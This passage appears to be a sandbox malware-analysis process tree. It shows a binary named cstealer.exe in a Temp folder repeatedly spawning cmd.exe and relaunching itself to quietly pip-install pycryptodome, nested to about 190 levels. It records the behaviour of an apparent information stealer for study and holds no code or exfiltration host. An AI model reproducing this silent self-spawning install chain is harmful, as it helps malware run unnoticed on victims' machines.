        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        39⤵
        
        PID:8212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        40⤵
        
        PID:8396
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        41⤵
        
        PID:8364
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        42⤵
        
        PID:8244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        43⤵
        
        PID:8420
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        44⤵
        
        PID:8448
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        45⤵
        
        PID:8516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        46⤵
        
        PID:8596
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        47⤵
        
        PID:8660
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        48⤵
        
        PID:8740
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        49⤵
        
        PID:9012
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        50⤵
        
        PID:8964
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        51⤵
        
        PID:9076
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        52⤵
        
        PID:7912
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        53⤵
        
        PID:8144
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        54⤵
        
        PID:8052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        55⤵
        
        PID:7116
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        56⤵
        
        PID:6708
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        57⤵
        
        PID:7636
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        58⤵
        
        PID:6400
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        59⤵
        
        PID:7484
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        60⤵
        
        PID:6512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        61⤵
        
        PID:7536
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        62⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        63⤵
        
        PID:8404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        64⤵
        
        PID:7916
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        65⤵
        
        PID:8272
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        66⤵
        
        PID:8700
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        67⤵
        
        PID:8856
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        68⤵
        
        PID:8944
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        69⤵
        
        PID:1988
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        70⤵
        
        PID:5908
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        71⤵
        
        PID:7980
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        72⤵
        
        PID:8008
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        73⤵
        
        PID:8032
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        74⤵
        
        PID:8000
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        75⤵
        
        PID:7180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        76⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        77⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        78⤵
        
        PID:4440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        79⤵
        
        PID:6552
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        80⤵
        
        PID:7076
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        81⤵
        
        PID:1472
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        82⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        83⤵
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        84⤵
        
        PID:7492
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        85⤵
        
        PID:6368
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        86⤵
        
        PID:7020
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        87⤵
        
        PID:5880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        88⤵
        
        PID:7844
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        89⤵
        
        PID:8492
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        90⤵
        
        PID:7360
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        91⤵
        
        PID:8532
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        92⤵
        
        PID:8692
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        93⤵
        
        PID:8804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        94⤵
        
        PID:8564
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        95⤵
        
        PID:8916
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        96⤵
        
        PID:5936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        97⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        98⤵
        
        PID:8012
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        99⤵
        
        PID:8044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        100⤵
        
        PID:9204
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        101⤵
        
        PID:8068
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        102⤵
        
        PID:6192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        103⤵
        
        PID:7524
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        104⤵
        
        PID:6580
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        105⤵
        
        PID:5156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        106⤵
        
        PID:6576
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        107⤵
        
        PID:7488
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        108⤵
        
        PID:4724
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        109⤵
        
        PID:6124
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        110⤵
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        111⤵
        
        PID:5704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        112⤵
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        113⤵
        
        PID:6776
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        114⤵
        
        PID:8512
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        115⤵
        
        PID:8820
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        116⤵
        
        PID:4152
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        117⤵
        
        PID:7900
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        118⤵
        
        PID:8616
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        119⤵
        
        PID:5916
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        120⤵
        
        PID:7192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        121⤵
        
        PID:9140
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        122⤵
        
        PID:8172
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        123⤵
        
        PID:6156
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        124⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        125⤵
        
        PID:6900
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        126⤵
        
        PID:7560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        127⤵
        
        PID:7528
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        128⤵
        
        PID:7592
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        129⤵
        
        PID:8508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        130⤵
        
        PID:8504
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        131⤵
        
        PID:1864
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        132⤵
        
        PID:484
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        133⤵
        
        PID:7196
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        134⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        135⤵
        
        PID:7504
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        136⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        137⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        138⤵
        
        PID:3704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        139⤵
        
        PID:8072
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        140⤵
        
        PID:8208
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        141⤵
        
        PID:9028
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        142⤵
        
        PID:9208
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        143⤵
        
        PID:5924
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        144⤵
        
        PID:4704
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        145⤵
        
        PID:6744
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        146⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        147⤵
        
        PID:7144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        148⤵
        
        PID:7696
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        149⤵
        
        PID:7608
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        150⤵
        
        PID:8340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        151⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        152⤵
        
        PID:1824
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        153⤵
        
        PID:9340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        154⤵
        
        PID:9504
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        155⤵
        
        PID:9620
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        156⤵
        
        PID:9776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        157⤵
        
        PID:9952
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        158⤵
        
        PID:10156
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        159⤵
        
        PID:10776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        160⤵
        
        PID:10864
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        161⤵
        
        PID:10984
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        162⤵
        
        PID:11212
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        163⤵
        
        PID:9228
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        164⤵
        
        PID:9696
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        165⤵
        
        PID:11440
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        166⤵
        
        PID:11588
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        167⤵
        
        PID:11828
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        168⤵
        
        PID:12100
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        169⤵
        
        PID:12224
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        170⤵
        
        PID:12312
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        171⤵
        
        PID:12564
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        172⤵
        
        PID:12668
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        173⤵
        
        PID:12748
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        174⤵
        
        PID:10352
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        175⤵
        
        PID:13048
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        176⤵
        
        PID:13124
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        177⤵
        
        PID:9880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        178⤵
        
        PID:11688
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        179⤵
        
        PID:12200
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        180⤵
        
        PID:13416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        181⤵
        
        PID:13548
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        182⤵
        
        PID:13628
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        183⤵
        
        PID:13876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        184⤵
        
        PID:12372
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        185⤵
        
        PID:14300
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        186⤵
        
        PID:9372
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        187⤵
        
        PID:9688
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        188⤵
        
        PID:9752
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet
        189⤵
        
        PID:10444
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cstealer.exe" -m pip install pycryptodome --quiet"
        190⤵
        
        PID:10548
        
        C:\Users\Admin\AppData\Local\Temp\cstealer.exe
        
